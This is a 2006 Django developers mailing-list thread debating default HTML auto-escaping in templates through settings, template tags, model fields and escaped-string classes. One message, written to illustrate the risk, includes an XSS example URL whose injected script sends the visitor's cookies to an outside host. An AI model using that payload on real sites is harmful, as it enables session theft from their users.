Proposal: default escaping

104 views
Skip to first unread message

SmileyChris

unread,
Jun 13, 2006, 6:49:15 PM6/13/06
to Django developers
Here's how I see it:
- 99% of the time, templates are HTML
- most template variables should be escaped
- developers are human and will miss variables that need escaping

My proposal is that all templates variables are escaped by default.


Think about it for a bit before you throw the idea away. Then reply
with your thoughts.


Of course we need an easy method to NOT auto-escape variables. Perhaps
something like {{{{ raw_variable }}}}?

There is also the issue of MASSIVE backwards incompatibility. The two
options I see ane:
1. A new variable type is created for auto-escaping instead
2. Provide a setting which turns this new functionality on but is off
by default

Rudolph

unread,
Jun 13, 2006, 7:07:27 PM6/13/06
to Django developers
Hi,

Pro:
- secure by default: you do not miss one variable because you have to
explicitly disable it for a variable, I would prefer a little more
verbose syntax like: {{ variable|noescape }}.

Con:
- explicit escaping is better then implicit escaping (no magic behind
the scenes)

I like your idea of explicitly turning it on or off globally in the
settings. In addition to that idea I would suggest an option to set the
behaviour for a whole Template, something like:

tmpl = loader.get_template('example.csv')
tmpl.auto_escape = False
tmpl.render(context)

You could also skip the idea of globally enabled escaping, and only do
it per template as described above. I'm not sure what I like the most.

Rudolph

Michael Radziej

unread,
Jun 14, 2006, 3:00:46 AM6/14/06
to django-d...@googlegroups.com
Hi,

Some time ago, I wrote something in this direction, it's a Template
subclass that escapes all variable nodes. I found that I don't use
it, but perhaps someone wants to build upon it. It works, but misses
a proper loader.

If you have a pre-formatted string, you have to turn it into an
HtmlEscapedString when putting it into the Context.

It's attached.

Michael

htmltemplate.py

Simon Willison

unread,
Jun 14, 2006, 4:57:46 AM6/14/06
to django-d...@googlegroups.com

On 14 Jun 2006, at 00:07, Rudolph wrote:

> I like your idea of explicitly turning it on or off globally in the
> settings. In addition to that idea I would suggest an option to set
> the
> behaviour for a whole Template, something like:
>
> tmpl = loader.get_template('example.csv')
> tmpl.auto_escape = False
> tmpl.render(context)

I'm not keen on either of those options. The template file itself is
the place where the assumption of escaping v.s. not-escaping matters.
Example: I write a template that expects auto escaping to be on:

<p>Hello, {{ name_from_form }}</p>

My assumption that escaping is turned on is built in to the template
file itself. If I hand it off to a friend and they deploy it
somewhere without realising that their settings file should have
AUTO_ESCAPE=True, they have an XSS hole. Alternatively, if they load
my template and set tmpl.auto_escape=False they have a hole as well.

Further more, setting auto escaping globally destroys all chances of
code reusability. What if I download a forum application from
somewhere and a poll application from somewhere else, and one of them
expects the global AUTO_ESCAPE option to be true while the other
expects it to be false? This is /exactly/ what happened with the
whole magic quotes thing in PHP and it made writing reusable PHP
components virtually impossible.

In my opinion, there are three viable solutions:

1. auto_escape is on for ALL Django templates ALL the time. It may
well be too late to do this due to backwards compatibility concerns.

2. auto_escape is controlled in the Django template file itself. The
above example might become something like this:

{% auto_escape_on %} <!-- global setting for this template -->
<p>Hello, {{ name_from_form }}</p>

Or maybe a block-style template tag:

{% autoescape %}
<p>Hello, {{ name_from_form }}</p>
{% endautoescape %}

While the second seems to fit better with previous template tags, I
actually prefer the first. It reminds me of Python's method for
stating that a .py source code is written in UTF-8:

# -*- coding: utf-8 -*-

3. Auto escape based on the file extension for the template -
"frontpage.html" gets auto escaped, "welcome_email.txt" doesn't. I'm
not sure how I feel about this option.

The ideal situation would be for auto_escape to be on by default, and
let templates turn it off if they need to. This has serious backwards
compatibility issues however.

Naturually, an "unescape" filter should be included so that even when
auto escaping is on you can still undo it on a per-variable basis if
you need to.

Cheers,

Simon

Gábor Farkas

unread,
Jun 14, 2006, 5:48:32 AM6/14/06
to django-d...@googlegroups.com
Simon Willison wrote:
>
>
> The ideal situation would be for auto_escape to be on by default, and
> let templates turn it off if they need to. This has serious backwards
> compatibility issues however.

the official opinion is that there's no backward-compatibility
guarantees before 1.0 anyway...

i understand that it would be nice not to break backward compatibility,
but escaping is imho such a serious issue, that imho it would make
sense, even if it causes backward-incompatibility.

and, if we'll have a template tag, like "{% auto_escape_off %}", then if
you do not want to break your older templates, simply add this line to
all of them, and everything will be like before. clean and simple.

gabor

Deryck Hodge

unread,
Jun 14, 2006, 8:26:33 AM6/14/06
to django-d...@googlegroups.com
Hi, all. <imitates_radio>First time caller here.</imitates_radio>

On 6/14/06, Simon Willison <swil...@gmail.com> wrote:
> In my opinion, there are three viable solutions:
>
> 1. auto_escape is on for ALL Django templates ALL the time. It may
> well be too late to do this due to backwards compatibility concerns.
>

Another concern about this option, rather than just backwards compatibility,
is that Django would be making assumptions about what I want to do with
my data. I don't agree with the assumption in the parent that "most template
variables should be escaped". Probably they should, but that's a debatable
point, not a fact.

One of the things I love about Django most, is that it doesn't make
assumptions about what I want to do, at least not assumptions of this kind.
It just gives me tools for doing what I want more efficiently.

> 2. auto_escape is controlled in the Django template file itself. The
> above example might become something like this:

I think this is better. Then it's still my choice, but I'm capable of
applying escaping more quickly and easily. It's about efficiency again. :-)

Cheers,
deryck

--
Deryck Hodge
http://www.devurandom.org/
http://www.samba.org/

"Aimless days, uncool ways of decathecting" --Mike Doughty (2005)

Derek Anderson

unread,
Jun 14, 2006, 9:44:47 AM6/14/06
to django-d...@googlegroups.com
the problem is that there are multiple types of escaping. sql? html?
javascript? new-web-tech-of-the-day? do you escape them all, or just some?

personally, i don't like my framework to auto-munge my data behind my
back. esp. in ways that are not clearly defined and could change on a
whim. too many potential secondary effects. plus it stinks to me of a
false sense of security while implicitly OKing people to ignore security.

but if it is going to be done, i'd suggest a flag on the field in the
model. ("automunge-html":="true"?) with perhaps a model default.

Simon Willison

unread,
Jun 14, 2006, 10:20:29 AM6/14/06
to django-d...@googlegroups.com
On 14 Jun 2006, at 14:44, Derek Anderson wrote:

> the problem is that there are multiple types of escaping. sql? html?
> javascript? new-web-tech-of-the-day? do you escape them all, or
> just some?
>
> personally, i don't like my framework to auto-munge my data behind my
> back. esp. in ways that are not clearly defined and could change on a
> whim. too many potential secondary effects. plus it stinks to me
> of a
> false sense of security while implicitly OKing people to ignore
> security.
>
> but if it is going to be done, i'd suggest a flag on the field in the
> model. ("automunge-html":="true"?) with perhaps a model default.

The model is definitely the wrong place for this - after all, a model
field might be output in a plain text email where escaping isn't
appropriate.

The problem here is very simple: XSS is the most common vulnerability
on the Web. It's unbelievably easy for an XSS vulnerability to sneak
in to an application - even experienced programmers who completely
understand the security implications are likely to forget to add a |
escape filter once in a while.

Obviously we DO need to be able to turn auto escaping off - there are
plenty of cases where it isn't appropriate. A classic example from
Django at the moment would be:

{% value|markdown %}

We should also be able to turn it off for people who don't like it,
like yourself!

BUT... we can't have it as a global setting. magic quotes in PHP has
taught us that much - global settings relating to auto filtering of
data lead to insanity when you start wanting to create reusable
applications.

That's why I'm keen on having escaping set at the template level. I'm
actually starting to feel that using the template extension might not
be a bad idea here. "index.html" has auto escaping, "index.txt"
doesn't. That way templates don't have to include an ugly extra tag
at the top of the code.

Cheers,

Simon

Derek Anderson

unread,
Jun 14, 2006, 10:48:16 AM6/14/06
to django-d...@googlegroups.com
the idea of it being in the model was more along the lines of validating
incoming data than it was munging outgoing. html is almost always
either acceptable or it's not in a given field. (per your example: who
want's arbitrary HTML allowed in a plain text email and not in a web
page?)

but i still argue that no implicit magic munging happen anywhere. it's
not that hard to get into safe-from-XSS coding styles. we did it for
sql injection, didn't we? :)

however, i would much rather have a flag/tag at the top of my template
than a global default based on template file type.

Deryck Hodge

unread,
Jun 14, 2006, 11:00:45 AM6/14/06
to django-d...@googlegroups.com
On 6/14/06, Derek Anderson <pub...@kered.org> wrote:
>
> the idea of it being in the model was more along the lines of validating
> incoming data than it was munging outgoing. html is almost always
> either acceptable or it's not in a given field. (per your example: who
> want's arbitrary HTML allowed in a plain text email and not in a web
> page?)
>
> but i still argue that no implicit magic munging happen anywhere. it's
> not that hard to get into safe-from-XSS coding styles. we did it for
> sql injection, didn't we? :)
>

I'm agreed with Simon that if this should happen it shouldn't be at the
model level, but I'm really in agreement with Derek on the larger issue
here that this shouldn't be turned on by default. It smells to me of
a false sense of security.

And really, if it's done at the template level, you'll still have to decide
when to turn on/off, so why change the default? I just like the idea of
adding a {% autoescape %} or something similar much better.

Just my .02...

Simon Willison

unread,
Jun 14, 2006, 11:13:16 AM6/14/06
to django-d...@googlegroups.com

On 14 Jun 2006, at 15:48, Derek Anderson wrote:

> the idea of it being in the model was more along the lines of
> validating
> incoming data than it was munging outgoing. html is almost always
> either acceptable or it's not in a given field. (per your example:
> who
> want's arbitrary HTML allowed in a plain text email and not in a web
> page?)
>
> but i still argue that no implicit magic munging happen anywhere.
> it's
> not that hard to get into safe-from-XSS coding styles. we did it for
> sql injection, didn't we? :)

It's not just about data from models though. The absolutely classic
XSS example is the search feature that redisplays the query:

blah.com/search?q=django

You searched for {{ q }}:

{% for result in searchresults %}
...
{% endfor %}

blah.com/search?q=<script>window.location='http://hax.ru/?
steal='+document.cookie</script>

XSS hole!

What do you think of auto escaping being on for .html templates and
off for .txt templates?

Cheers,

Simon

Michael Radziej

unread,
Jun 14, 2006, 11:19:56 AM6/14/06
to django-d...@googlegroups.com
Hmm. I see two different cases that get munched in the discussion:

a) You run data through some filter or inside a html tag where it shouldn't be escaped.
For this, you (or the designer) need to specify this in the template.

b) Parts of the context are pre-assembled html or are already unescaped. The designer can't
always know when this is the case.
To cope with this, I really like the approach of Ian Bicking's Quixote:
Everything that has already been escaped is packaged in a wrapper class,
so that you pass something like
HtmlEscaped('<a href="..">bla</a>')
into the context.

Michael

oggie rob

unread,
Jun 14, 2006, 12:19:20 PM6/14/06
to Django developers
> What do you think of auto escaping being on for .html templates and off for .txt templates?

Simon,
Sounds clean but consider:
a) The ever-present argument about file extensions & template syntax
(that we seemed to solve with MR)
b) These can't be so easily extended. For example, to switch your
entire app from non-escaping to escaping you have to rename all your
files. If you set a variable in a base template, you can just add the
tag there.
So I think {% auto_escape_on %} or {% auto_escape_off %} are better
options (depending on consensus to which should be the default).

-rob

Simon Willison

unread,
Jun 14, 2006, 12:51:28 PM6/14/06
to django-d...@googlegroups.com

On 14 Jun 2006, at 17:19, oggie rob wrote:

> a) The ever-present argument about file extensions & template syntax
> (that we seemed to solve with MR)
> b) These can't be so easily extended. For example, to switch your
> entire app from non-escaping to escaping you have to rename all your
> files. If you set a variable in a base template, you can just add the
> tag there.
> So I think {% auto_escape_on %} or {% auto_escape_off %} are better
> options (depending on consensus to which should be the default).

You've got me convinced. In that case, my preference is probably for
auto escape to be on by default, and for it to be turn on-and-offable
with {% autoescape on %} and {% autoescape off %}.

Deryck Hodge

unread,
Jun 14, 2006, 1:02:51 PM6/14/06
to django-d...@googlegroups.com
On 6/14/06, Simon Willison <swil...@gmail.com> wrote:
>

My preference would be off by default with the same on-and-offable
tags listed here. I'd rather make the conscious choice to escape rather
than unescape. And your still backwards compatible at that point.

But I can live with on by default, too. :-)

Rudolph

unread,
Jun 14, 2006, 1:48:54 PM6/14/06
to Django developers
Hi,

Derek Anderson mentioned the need for different kinds of escaping. So
maybe the syntax should be more something like:

{% autoescape xml on %}

and

{% autoescape javascript on %}

Rudolph

Jacob Kaplan-Moss

unread,
Jun 14, 2006, 3:08:11 PM6/14/06
to django-d...@googlegroups.com
Hi folks --

So the benefits of automatic escaping are pretty obvious --
protection from XSS attacks -- but I'm wary of a few details in the
existing proposals.

First, escaping everything by default complete breaks every existing
template. That's not necessarily a complete deal-breaker, but I'm
pretty much -1 on the idea as it seems too radical.

I like the proposal by Simon (et al) for an {% autoescape on %} tag.
However, there are some semantics of the tag that are scary. Not
doing it as a block tag means that simply by calling the tag I've
switched the template language into a different system. That has non-
obvious implications when used with extension/inclusion. For example::

base.html:

{% autoescape on %}
{% block content %}{% endblock %}

child.html:

{% extends "base.html" %}
{% block content %}{{ var }}{% endblock %}

How does {{ var }} behave in the child template?

And for content brought in through {% include %}?

Sure, answers to these questions can be documented, but I still think
they'd be non-obvious. Because of that, I'm -0 on this concept
without further exploration.

Given that, I think the best idea is still using a block tag::

{% escape %}
{{ var }}
{% endescape %}

that just seems the most clear to me.

Jacob

gabor

unread,
Jun 14, 2006, 4:04:29 PM6/14/06
to django-d...@googlegroups.com
Jacob Kaplan-Moss wrote:
> Hi folks --
>
> So the benefits of automatic escaping are pretty obvious --
> protection from XSS attacks -- but I'm wary of a few details in the
> existing proposals.
>
> <snip/>

i completely agree that before doing such a global change, all
consequences will have to be examined/specified.


>
> Given that, I think the best idea is still using a block tag::
>
> {% escape %}
> {{ var }}
> {% endescape %}
>
> that just seems the most clear to me.

maybe we could try to answer a question:

is it true, that people usually forget to escape dangerous variables?


a) if no (people do not forget):
means people are already using 'escape' when needed. in this case, this
block-level tag is a welcome addition, because it makes it
simpler/more-convenient to toggle escaping.


b) if yes (people do forget):
a block level tag will not help. people will forget to use them the same
way they forget to use the 'escape' filter.

my guess is (b)

gabor

SmileyChris

unread,
Jun 15, 2006, 12:19:33 AM6/15/06
to Django developers
gabor wrote:
> my guess is (b)

I think (b) is pretty much a given. Looking back in the developers
group history, I see this is a recurring problem that seems to keep
getting put in the "too hard" basket.

See:
http://groups.google.com/group/django-users/browse_thread/thread/21da889ecb9c63dd/145e3e9c0e39b310
which references:
http://groups.google.com/group/django-users/browse_thread/thread/13cf8218d3a18aad/f4648b081c90885a
http://groups.google.com/group/django-developers/browse_thread/thread/e448bbdd40426915/2ee9766d0d148706

Gary Wilson

unread,
Jun 15, 2006, 1:55:44 PM6/15/06
to Django developers
gabor wrote:
> is it true, that people usually forget to escape dangerous variables?
>
>
> a) if no (people do not forget):
> means people are already using 'escape' when needed. in this case, this
> block-level tag is a welcome addition, because it makes it
> simpler/more-convenient to toggle escaping.
>
>
> b) if yes (people do forget):
> a block level tag will not help. people will forget to use them the same
> way they forget to use the 'escape' filter.
>
> my guess is (b)

or

c) people don't know what XSS is and are clueless about the need to
escape. A good case for turning escaping on by default.


What would you rather have:
"Help, help! How do I turn off escaping?"
or
"Help, help! H4a0r s+0l3|> my Dj4|\|g0!!!!!!!!111"

James Bennett

unread,
Jun 15, 2006, 2:15:41 PM6/15/06
to django-d...@googlegroups.com
On 6/15/06, Gary Wilson <gary....@gmail.com> wrote:
> What would you rather have:
> "Help, help! How do I turn off escaping?"

I don't know... memories are stirring of my PHP days and the horror of
magic_quotes...


--
"May the forces of evil become confused on the way to your house."
-- George Carlin

Norman Harman

unread,
Jun 15, 2006, 2:37:33 PM6/15/06
to django-d...@googlegroups.com
For my ImageUploadFields I ignore the filename provided by user and
and name it something specific. I got real tired of the save_file
method appending underscores when it found a file with that name
already existed.

So, added this delete_fieldname_file(). Works like save_filename_file
but deletes any file named get_fieldname_file.

Maybe somemone else likes it. It should be added to mr.

patch attached, I hope...

delme

Rowan Kerr

unread,
Jun 15, 2006, 6:44:04 PM6/15/06
to django-d...@googlegroups.com
On 6/15/06, James Bennett <ubern...@gmail.com> wrote:
> I don't know... memories are stirring of my PHP days and the horror of
> magic_quotes...

As long as the data is only escaped on final output (and here escaping
should actually be intelligent as to whether it's outputting html, or
some mime-encoded email). magic_quotes mangled all your data no matter
where it was from or where it was going.

-Rowan

Phil Powell

unread,
Jun 16, 2006, 9:17:14 AM6/16/06
to django-d...@googlegroups.com
On 14/06/06, oggie rob <oz.rob...@gmail.com> wrote:
> So I think {% auto_escape_on %} or {% auto_escape_off %} are better
> options (depending on consensus to which should be the default).

I'm kind of +1 for leaving it off by default - I'm not keen on data
getting munged behind my back.

And as for the argument that people will forget to use it - I have the
hard-line opinion of: tough, you should be more careful. If it
forcibly makes developers more aware of the possibilities of XSS et
al, then that can only be a good thing.

Just to throw something else into the mix: how about a HTMLField?

-Phil

Christopher Lenz

unread,
Jun 16, 2006, 12:17:35 PM6/16/06
to django-d...@googlegroups.com
Am 14.06.2006 um 21:08 schrieb Jacob Kaplan-Moss:
[snip]

> Given that, I think the best idea is still using a block tag::
>
> {% escape %}
> {{ var }}
> {% endescape %}

I feel this is inelegant and insufficient. Back when this topic was
raised last time, I chimed in with a reference to how we handling
HTML escaping in Trac:

http://groups.google.com/group/django-developers/browse_thread/
thread/e448bbdd40426915/9962020f9699471c?q=lenz&rnum=8#9962020f9699471c

To reiterate: templates shouldn't need to care about escaping. Django
*in particular* uses an intentionally dumbed down template system
that is supposed to be easy for non-programmers, which includes the
notion that little mistakes in templates shouldn't break the site or
even introduce security holes.

IMHO, a real solution for this problem is that any normal string
inserted into template output is escaped by default. This does not
necessarily mean that there needs to be an unescape filter, though.
In fact, most of the time Django components that generate a string
they *know* that they are generating text that must not be escaped,
such as the output of the markdown filter, or form field render()
results. Those places should flag the strings they are generating in
some way (for example by wrapping them in a special class), thereby
signaling to the template system that those strings should not be
escaped again.

Now, I'll admit that the Django template engine being output-type
agnostic is a problem in this context. But then again, I'm not happy
with Django templating in general, so I'll just shut up now :-P

Cheers,
Chris
--
Christopher Lenz
cmlenz at gmx.de
http://www.cmlenz.net/

SmileyChris

unread,
Jun 18, 2006, 12:54:22 AM6/18/06
to Django developers
Brilliant, Christopher. This is exactly the solution I'd be pleased
with!

We still have the problem of invalidating every single template written
so far in Django, however...

James Bennett

unread,
Jun 18, 2006, 2:54:25 AM6/18/06
to django-d...@googlegroups.com
On 6/16/06, Christopher Lenz <cml...@gmx.de> wrote:
> To reiterate: templates shouldn't need to care about escaping. Django
> *in particular* uses an intentionally dumbed down template system
> that is supposed to be easy for non-programmers, which includes the
> notion that little mistakes in templates shouldn't break the site or
> even introduce security holes.

The problem here, architecture-wise, is that the template is the thing
that cares about what output looks like. Moving the decision of
whether to escape or not into some other part of the stack breaks with
that and introduces the possibility of frustrating inconsistency in
the templating system; explaining to a template author why {{ foo }}
escapes in one case but not another, based on (to the template author)
black magic happening in the backend isn't something I particularly
want to do.


> IMHO, a real solution for this problem is that any normal string
> inserted into template output is escaped by default. This does not
> necessarily mean that there needs to be an unescape filter, though.

Yes. Yes, it does.

> In fact, most of the time Django components that generate a string
> they *know* that they are generating text that must not be escaped,
> such as the output of the markdown filter, or form field render()
> results. Those places should flag the strings they are generating in
> some way (for example by wrapping them in a special class), thereby
> signaling to the template system that those strings should not be
> escaped again.

As someone who's followed various RSS-related discussions for a long
time, I can say that having multiple layers of a system have to worry
about whether the other layers have escaped or unescaped something is
a very special kind of hell that I don't want Django to get mired in.

But beyond that, it feels like a violation of loose coupling; doing
this would bind Django components to each other in ways that don't
feel right.

My vote is for escaping being off unless explicitly turned on, and for
it being turned on in the template.

pub...@kered.org

unread,
Jun 19, 2006, 3:18:13 PM6/19/06
to django-d...@googlegroups.com
To better detail the "in the model" idea:

An additional field type would be added, extending CharField, called say
"HTMLSafeField". It would strip/escape/convert/reject invalid strings
both when being set and when being read. Otherwise it would behave just
like a CharField.

The key is not to think of it as an escaping mechanism; simply as a data
validity check. And there is ample precedence for this in Django. What
are EmailFields, PhoneNumberFields and SlugFields if not simply CharFields
that match a regex?

"Intro" users who are not able to grok XSS can simply be told to always
use HTMLSafeFields instead of CharFields. Converting existing apps would
be simple model-only search-and-replace exercises. Folks who don't like
wrapper tags around all variables in templates will be appeased. (as will
those who don't want "escape=on" tags at the top of every template) And I
(and my like-minded kin) who think both "breaking every template==bad" and
"magic behind the scenes==worse" will not vomit at the addition.

Likewise XMLSafeField, JavascriptSafeField, MustMatchUserRegexField, etc.
would be logical extensions.

The biggest downside is if you want valid HTML data stored for one output
type and escaped for another. But this is not a scenario I've ever seen
in the real world, and regardless is easily worked around with simply
returning to CharFields for that one attribute. (and manually escaping of
course)

What do you think?

-- Derek

Simon Willison

unread,
Jun 19, 2006, 3:37:28 PM6/19/06
to django-d...@googlegroups.com

On 19 Jun 2006, at 20:18, pub...@kered.org wrote:

> The biggest downside is if you want valid HTML data stored for one
> output
> type and escaped for another. But this is not a scenario I've ever
> seen
> in the real world, and regardless is easily worked around with simply
> returning to CharFields for that one attribute. (and manually
> escaping of
> course)
>
> What do you think?

I'm not keen on escaping being controlled by the model - escaping
should be a template-level decision as that's when you decide what
format is being output (plain text email / HTML / XML / LaTeX for PDF
conversion etc).

I played around with some proof of concepts over the weekend and I
think I have some ideas that should keep most people happy. I'll try
to write them up on the wiki this evening.

Cheers,

Simon

pub...@kered.org

unread,
Jun 19, 2006, 4:00:57 PM6/19/06
to django-d...@googlegroups.com
> I'm not keen on escaping being controlled by the model - escaping
> should be a template-level decision as that's when you decide what
> format is being output (plain text email / HTML / XML / LaTeX for PDF
> conversion etc).
>
> I played around with some proof of concepts over the weekend and I
> think I have some ideas that should keep most people happy. I'll try
> to write them up on the wiki this evening.

that's why i suggest looking at this as a data validation issue. (not
simply as escaping) we do lots of validation in the model already. (some
argue that *all* data validation should be in the model) this would just
be an additional type.

anyway, i suppose i will wait for you to elaborate on your reasoning in
the wiki this evening. :)

SmileyChris

unread,
Jun 19, 2006, 11:42:39 PM6/19/06
to Django developers
pub...@kered.org wrote:

> that's why i suggest looking at this as a data validation issue. (not
> simply as escaping) we do lots of validation in the model already.

But it is an escaping issue.
There's nothing wrong with allowing html to be entered in (for example)
a comment field. It should be escaped in most templates, but sometimes
not, for example if there was a plain-text email of comments that gets
sent.

Simon Willison

unread,
Jun 20, 2006, 2:50:41 AM6/20/06
to django-d...@googlegroups.com

On 19 Jun 2006, at 21:00, pub...@kered.org wrote:

> anyway, i suppose i will wait for you to elaborate on your
> reasoning in
> the wiki this evening. :)

I've written up a proposal for how we can implement auto escaping
while hopefully keeping most people happy:

http://code.djangoproject.com/wiki/AutoEscaping

It incorporates stuff from a whole bunch of prior discussions. In my
opinion the most important aspect is the use of special escapedstr
and escapedunicode subclasses to mark a string as having been already
escaped, meaning that the auto escaping mechanism knows if it should
kick in to action or not. This should also avoid double escaping, and
allow a decent level of finely grained control over the escaping
mechanism.

I'd like to get a branch going to explore this stuff properly. From
messing around with my own local code it seems like it should all
work, but there's a bunch of work that needs to be done to make
existing Django filters and templates auto escape compliant.

Cheers,

Simon

Michael Radziej

unread,
Jun 20, 2006, 4:34:45 AM6/20/06
to django-d...@googlegroups.com
Simon Willison wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

GoodStuff! (tm)

Michael

adurdin

unread,
Jun 20, 2006, 5:50:07 AM6/20/06
to Django developers
Simon Willison wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

A very nice solution, with a good method of automatically flagging
things as escaped or not; but it seems to me more complicated than is
needed. And, of course there's more than just html escaping needed;
URLs should be escaped differently, and other values intended to be
used as attributes also need a different escape filter -- I'm not sure
your proposal will allow these to be handled correctly and
conveniently. So here's another idea to throw into the soup:

Having the context aware of the primary escaping needs of the output is
a nice idea, but as James Bennett pointed out, the template is what
should be making the decision. Suppose the template render had a
"default filter" that would get applied to all otherwise unfiltered
output? Obviously, the default value for this would be
django.template.defaultfilters.escape -- but it could be set to
another filter for JSON output, or to None for plain text. One
possible mechanism for doing this would be a {% default_filter ... %}
tag in the template...?

Assuming the default, then {{name}} would be the equivalent of
{{name|escape}}, whereas <a href="{{myurl|urlencode}}"> would remain
unchanged, and a new filter "raw" (just a pass-thru) could be used for
situations like <script>{{myscript|raw}}</script>.

The main drawback I see with this is that the behaviour of
{{mylist|count}} is not obviously unescaped. Perhaps having all output
piped through the default filter unless it is piped through the "raw"
filter (which could perhaps be handled using Michael's escaped
strings)?

Andrew

adurdin

unread,
Jun 20, 2006, 6:05:00 AM6/20/06
to Django developers
adurdin wrote:
>
> The main drawback I see with this is that the behaviour of
> {{mylist|count}} is not obviously unescaped.

I meant {{mylist|length}}, of course.

Todd O'Bryan

unread,
Jun 20, 2006, 7:02:33 AM6/20/06
to django-d...@googlegroups.com
Couldn't we do something less invasive/complicated?

How about

{{ var }}

by default escapes the contents (in other words, the very first
filter called on a variable is escape, by default) and

{{ var|raw }}

skips the call to escape?

It breaks backwards compatibility, but maybe there's a way to avoid
that with a setting of some sort. (Say AUTO_ESCAPE=false in
settings.py for people who don't want the change.)

Todd

Todd O'Bryan

unread,
Jun 20, 2006, 7:05:50 AM6/20/06
to django-d...@googlegroups.com
Hey. We came up with this independently. It must be a good idea. :-)

Todd

Michael Radziej

unread,
Jun 20, 2006, 7:15:01 AM6/20/06
to django-d...@googlegroups.com
Hi,

I thought a little bit about your remarks and I think all your problems can be solved.

Perhaps it's also a good idea to add an attribute `raw` to the class `escaped`, so that
you can always access the raw string when it is necessary. In some circumstances, such
as when you pass a complete html table in the context, this could simply raise an error.

adurdin wrote:
> Simon Willison wrote:
>> I've written up a proposal for how we can implement auto escaping
>> while hopefully keeping most people happy:
>>
>> http://code.djangoproject.com/wiki/AutoEscaping
>
> A very nice solution, with a good method of automatically flagging
> things as escaped or not; but it seems to me more complicated than is
> needed. And, of course there's more than just html escaping needed;
> URLs should be escaped differently, and other values intended to be
> used as attributes also need a different escape filter -- I'm not sure
> your proposal will allow these to be handled correctly and
> conveniently.

Well then ... one thing after the other, and first things first ;-)

You could simply encode the URL, as you currently need to do anyway, and then mark it as escaped.
Or, there could be a separate class, similar to `escaped` from Simon's proposal, that would mark
url-encoded strings. If necessary. I find myself creating links almost completely with template tags, and they
would care about the actual encoding.

So here's another idea to throw into the soup:
>
> Having the context aware of the primary escaping needs of the output is
> a nice idea, but as James Bennett pointed out, the template is what
> should be making the decision.

I still don't see why. The programmer who has assembled the string should know best
whether it is already escaped or not, (and usually it isn't). The template might know when
to escape an unescaped string, but it can't know if this is a piece of html that should
be left as is.

Note that the escaping does not happen in the context, but during rendering, so that template filters
and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.

> Suppose the template render had a
> "default filter" that would get applied to all otherwise unfiltered
> output? Obviously, the default value for this would be
> django.template.defaultfilters.escape -- but it could be set to
> another filter for JSON output, or to None for plain text. One
> possible mechanism for doing this would be a {% default_filter ... %}
> tag in the template...?

That's fine with the proposal. Just have the "default filter" check whether this is already escaped
or not.

> Assuming the default, then {{name}} would be the equivalent of
> {{name|escape}}, whereas <a href="{{myurl|urlencode}}"> would remain
> unchanged, and a new filter "raw" (just a pass-thru) could be used for
> situations like <script>{{myscript|raw}}</script>.

Or: {% autoescape off %}<script>{{myscript}}</script>{% endautoescape %}
Or: write a simple template tag {% script %} if you need this a lot.

>
> The main drawback I see with this is that the behaviour of
> {{mylist|count}} is not obviously unescaped. Perhaps having all output
> piped through the default filter unless it is piped through the "raw"
> filter (which could perhaps be handled using Michael's escaped
> strings)?

Michael

Simon Willison

unread,
Jun 20, 2006, 7:48:32 AM6/20/06
to django-d...@googlegroups.com
On 20 Jun 2006, at 12:02, Todd O'Bryan wrote:
> Couldn't we do something less invasive/complicated?
>
> How about
>
> {{ var }}
>
> by default escapes the contents (in other words, the very first
> filter called on a variable is escape, by default) and
>
> {{ var|raw }}
>
> skips the call to escape?

This doesn't interact well with many filters - things like urlize or
markdown or any of the filters that expect non-escaped content. They
either have to unescape stuff that is fed to them (nasty) or you need
to manually chain a 'raw' filter in before them (also nasty).

> It breaks backwards compatibility, but maybe there's a way to avoid
> that with a setting of some sort. (Say AUTO_ESCAPE=false in
> settings.py for people who don't want the change.)

As discussed previously, I'm dead against a global setting because
they completely kill application portability. PHP's magic quotes
global setting is a great example of this - for a long time there
were apps that expected it to be on and others that expected it to be
off and as a result you couldn't mix and match code.

There are some links to previous discussions on this stuff at the
bottom of http://code.djangoproject.com/wiki/AutoEscaping .

Cheers,

Simon

Simon Willison

unread,
Jun 20, 2006, 7:49:23 AM6/20/06
to django-d...@googlegroups.com

On 20 Jun 2006, at 12:15, Michael Radziej wrote:

> Perhaps it's also a good idea to add an attribute `raw` to the
> class `escaped`, so that
> you can always access the raw string when it is necessary. In some
> circumstances, such
> as when you pass a complete html table in the context, this could
> simply raise an error.

I'm not sure that this would be a problem. That's why I want to get a
branch up and running - a lot of the problems with this stuff are
hard to predict until you're running actual code.

Cheers,

Simon

adurdin

unread,
Jun 20, 2006, 8:48:34 AM6/20/06
to Django developers
Michael Radziej wrote:

>
> adurdin wrote:
>
> You could simply encode the URL, as you currently need to do anyway, and then mark it as escaped.

True.

> > Having the context aware of the primary escaping needs of the output is
> > a nice idea, but as James Bennett pointed out, the template is what
> > should be making the decision.
>
> I still don't see why. The programmer who has assembled the string should know best
> whether it is already escaped or not, (and usually it isn't). The template might know when
> to escape an unescaped string, but it can't know if this is a piece of html that should
> be left as is.

Not at all -- the template author will know based on the source of the
string, and can make an appropriate decision as to whether it should be
passed through raw or not. Although having though more about this, I
can't see that it offers any benefit over your intelligent
auto-escaping apart from being explicit in the template. The real
benefit of that is probably a matter of opinion.


Regardless, there's another situation that will most likely arise that
needs to be discussed in your proposal: A string of escaped text is to
be rendered with *further* escaping. What should happen for {{
escaped_str|escape }}? One use case for this is a page with both a
preview and an edit field for HTML content:

{{ page_html }}
<textarea>{{ page_html|escape }}</textarea>

Nothing difficult to solve here, just aiming for completeness.


> Note that the escaping does not happen in the context, but during rendering, so that template filters
> and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.

One thing that bothered me about the proposal was having the
auto-escape property set in the context; which I believe is the wrong
place; it should be set in the Template instance (or subclass). A
context should be reusable between different templates (e.g. an html
page, a JSON object, an XML page).

Andrew

Michael Radziej

unread,
Jun 20, 2006, 9:26:08 AM6/20/06
to django-d...@googlegroups.com
Hey Andrew!

adurdin wrote:
> Michael Radziej wrote:
>> adurdin wrote:
>>> Having the context aware of the primary escaping needs of the output is
>>> a nice idea, but as James Bennett pointed out, the template is what
>>> should be making the decision.
>> I still don't see why. The programmer who has assembled the string should know best
>> whether it is already escaped or not, (and usually it isn't). The template might know when
>> to escape an unescaped string, but it can't know if this is a piece of html that should
>> be left as is.
>
> Not at all -- the template author will know based on the source of the
> string, and can make an appropriate decision as to whether it should be
> passed through raw or not.

Now this is probably the most important point where our discussion boils down.

